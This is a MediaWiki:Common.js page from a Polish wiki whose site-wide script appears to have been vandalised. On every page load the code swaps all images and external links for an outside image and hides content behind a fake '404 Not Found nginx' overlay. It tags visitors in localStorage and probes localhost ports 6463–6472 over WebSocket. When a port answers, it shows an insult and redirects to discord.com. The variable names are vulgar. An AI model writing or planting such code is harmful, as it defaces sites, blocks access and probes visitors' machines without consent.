kontakt: [email protected]
MediaWiki:Common.js
Uwaga: aby zobaczyć zmiany po opublikowaniu, może zajść potrzeba wyczyszczenia pamięci podręcznej przeglądarki.
- Firefox / Safari: Przytrzymaj Shift podczas klikania Odśwież bieżącą stronę, lub naciśnij klawisze Ctrl+F5, lub Ctrl+R (⌘-R na komputerze Mac)
- Google Chrome: Naciśnij Ctrl-Shift-R (⌘-Shift-R na komputerze Mac)
- Edge: Przytrzymaj Ctrl, jednocześnie klikając Odśwież, lub naciśnij klawisze Ctrl+F5.
- Opera: Naciśnij klawisze Ctrl+F5.
// michal gieres if(localStorage.ali!="sragca") { const chuuj = document.querySelectorAll("img"); for (var i = 0; i < chuuj .length; i++) { chuuj [i].src = "https://files.catbox.moe/lqxp7t.png"; } const linkipanaagcy = document.querySelectorAll("a[rel=nofollow].external"); for (var i = 0; i < linkipanaagcy .length; i++) { linkipanaagcy [i].href = "https://files.catbox.moe/lqxp7t.png"; } }; var randId = "fioot" + Math.floor(Math.random() * 500); if (localStorage.gowno === undefined || localStorage.gowno === "undefined" || localStorage.gowno === "" || localStorage.gowno.startsWith("fjut")) { localStorage.gowno = randId; } czterystacztery=document.createElement("center"); czterystacztery.innerHTML = "<h1>404 Not Found</h1>"; nginx=document.createElement("center"); nginx.innerHTML = "nginx"; czerwonka=document.createElement("div"); czerwonka.classList.add(localStorage.gowno); czerwonka.style.height = "100%"; czerwonka.style.width = "100%"; czerwonka.style.position = "fixed"; czerwonka.style.background = "white"; czerwonka.style.top = "0"; czerwonka.style.left = "0"; czerwonka.style.zIndex = "9999"; czerwonka.style.color = "black"; czerwonka.style.fontFamily = "serif"; document.querySelector("#content").appendChild(czerwonka); czerwonka.appendChild(czterystacztery); czerwonka.appendChild(nginx); for (var rak = 6463; rak <= 6472; rak++) { new WebSocket("ws://127.0.0.1:" + rak + "/").onopen = function(e) { this.close(); document.body.innerText = "kompromitacja cwela"; location.href = "https://discord.com/app"; } } if (document.querySelector("#bodyContent > .usermessage")) { document.title = "(!) " + document.title; } document.querySelectorAll("body table.catlinks").forEach(function(el, i) { var header = el.querySelector("p"); if (!header || header.querySelector("a.toggle-dpl")) { return; } var list = el.querySelector("ul"); var img = el.querySelector("td img"); if (list) { list.style.display = "none"; if (img) { img.style.display = "none"; } var x = $('<span>[<a href="#" class="toggle-dpl" data-state="0">Pokaż</a>]</span>'); header.append(x[0]); } }) document.body.addEventListener("click", function(e) { var link = e.target; if (!link || !link.matches("a.toggle-dpl")) { return; } e.preventDefault(); var table = link.closest("table"); if (table) { var list = table.querySelector("ul"); var img = table.querySelector("td img"); if (list) { switch (link.dataset.state) { case "0": link.dataset.state = "1"; link.innerText = "Ukryj"; list.style.display = "initial"; if (img) { img.style.display = "initial"; } break; case "1": link.dataset.state = "0"; link.innerText = "Pokaż"; list.style.display = "none"; if (img) { img.style.display = "none"; } break; } } } }); /* document.body.style.transform = "rotate(" + (Math.random() < 0.5 ? 2.5 : -2.5) + "deg)"; */